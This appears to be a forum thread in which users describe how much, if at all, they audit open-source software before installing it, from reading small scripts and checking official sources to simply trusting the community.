Yes. I have various ways I check, including reading the source code, looking for open known vulnerabilities, and reviewing recent commit history to see if it’s still actively maintained.

And…Looking at the other replies here - you’re all welcome, I guess. Yes. I am that part of the community. We exist. There may be dozens of usm…

Anyway. Thank you all for all you do in the community, too. High fives all around.

I wouldn’t say blindly, rather my heuristic is, the most long term and popular a project is, the less I’ll bother.

If I do though get a random script from a random repository, rather than from say Debian official package manager from main contrib sources, then I will check.

If it’s another repository, say Firefox from Mozilla or Blender then I won’t check but I’ll make sure it genuinely comes from there, maybe not a mirror or that the mirror does have a checksum that gets validated.

So… investment on verifying trust us is roughly proportional to how little I expect others to check.

I’ve worked on FOSS stuff with very large user bases and seen very obvious flaws go unnoticed for several years, so I guess most people don’t.

So the whole thing about FOSS is that at its core, someone could add malicious features or whatever to a codebase, but it can be discovered if people notice adverse effects and dig into it.

Like that one supply chain attack by “Jia Tan” on xz tools, that was quite nefarious, well planned and executed, yet some nerd noticed a slightly longer than normal response time and looked into it (a gross simplification, some luck might have been involved but you get the point). If it were a closed-source proprietary tool, the owners would shrug their shoulders and gaslight people into believing it’s nothing.

That’s why people make a fuss about binary blobs in FOSS code, if anything unwanted was happening, it could always be from there.

My personal level of checking is ensuring that I have gone to the correct official source, but I will generally have to trust the builder that was linked from that source did not modify or inject anything.

I don’t. I just hope for the best and try to install as few things as possible.

I’m focussing on disaster recovery now, more than prevention. Prevention seems like it’s almost impossible in this age.

EDIT: I mistakenly answered based on security, not privacy.

If it’s a package I’m not familiar with and is relatively small/unknown then I’ll give it a brief once over to see if there’s anything that sticks out (obfuscated code, making http requests when the package should never do that, etc.). Most of the time though it is just trusting the FOSS community.

Not a dev here so I have to trust what I’m hosting on my server…

I do check the issue section and base my opinion on how healthy a repo is and how long it hasn’t been update.

Based on popularity also helps a bit? Check how san their docker-compose is and how complicated and what closed source thing they integrate in the image, but that’s it !

However, on android I do some app analysis with PCAPdroid to check what strange communications is happening behind the scenes.

No.

I’ll just hope there’s a nerd out there protecting me by verifying the source code.

You can’t expect everyone to do their own research, but general rule of thumb:

Open Source > Close Source

Just as: Democracy > Autocracy

I don’t have any of the knowledge to be able to do it.

I just hope that others who do, and are interested in the app, are doing their part.

Not at all unfortunately. I’m not a programmer though.

Truth be told, I’ve very rarely specifically audit code of projects I use. Sometimes when something is broken or is missing a feature, I will go in and try to remedy that. On a couple of occasions I’ve noticed other bugs that I then fix too.

The only exception to that are when I’m using some random script I’ve found on the internet - I will read through it to see what it does. This is somewhere between “software I download” and “copy-paste development”, as I will often also tweak the script to suit my needs better.

I don’t think it’s humanly possible for a single person to audit everything they are using. There are millions (perhaps even hundreds of millions?) SLOC in any desktop Linux installation, it would take decades of effort to even skim all that for obvious faults, let alone properly audit it. If you are crazy enough to use something like Dusk OS, then I could see it, but how many people are?

Nah. I trust open source devs with all my heart. If anything goes wrong then I’ll think about it.

I’ve glanced over a project or two before. It’s usually less an audit, and more of a ‘what is going on in there?’ curiosity.

Though it does have the side-effect of being a low-intensity audit as well. :)

Click file “Yup, looks like code all right”

I don’t really care about low quality code as long as its still the best tool for the job. I blindly trust that any malicious code in popular sofware would quickly be called out.

The more niche, the more likely I feel like first investigating what exactly it does before i download.

Realistically i would probably not be able to tell without consulting an llm though.

I’ve reviewed code, in particular I’ve looked over merge requests on occasion but mostly out of academic interest than being very concerned over security. Just want to see how people accomplish a task. Learning.

I’ve monitored network traffic just because sometimes I just want to do that rather than paranoia. Practice and learning.

I’ve run code through a local sonarqube instance and whatever other scanning software I feel like trying along with building applications from source but again it’s not from paranoia but for personal interest that’s mostly just making sure I’m in practice of being able to do so.

I’m not a security professional so I don’t have the background and experience to really notice things that can be problematic like people I know who have a career directly cyber-net-etc-security related rather than my tangential

So really I don’t audit code. At least not huge codebases. When it’s just a few 100 line files of python to accomplish something, I’ll read them. There’s usually a requirements.txt in there though pulling in pip packages and I know I haven’t audited up the dependencies. At work there’s standards handled by people where it’s their job to determine whether the code you’ve written and dependencies pass the minimum to be deployable to computers on the network and that too is mostly handled by security scanning software both open source and closed commercial software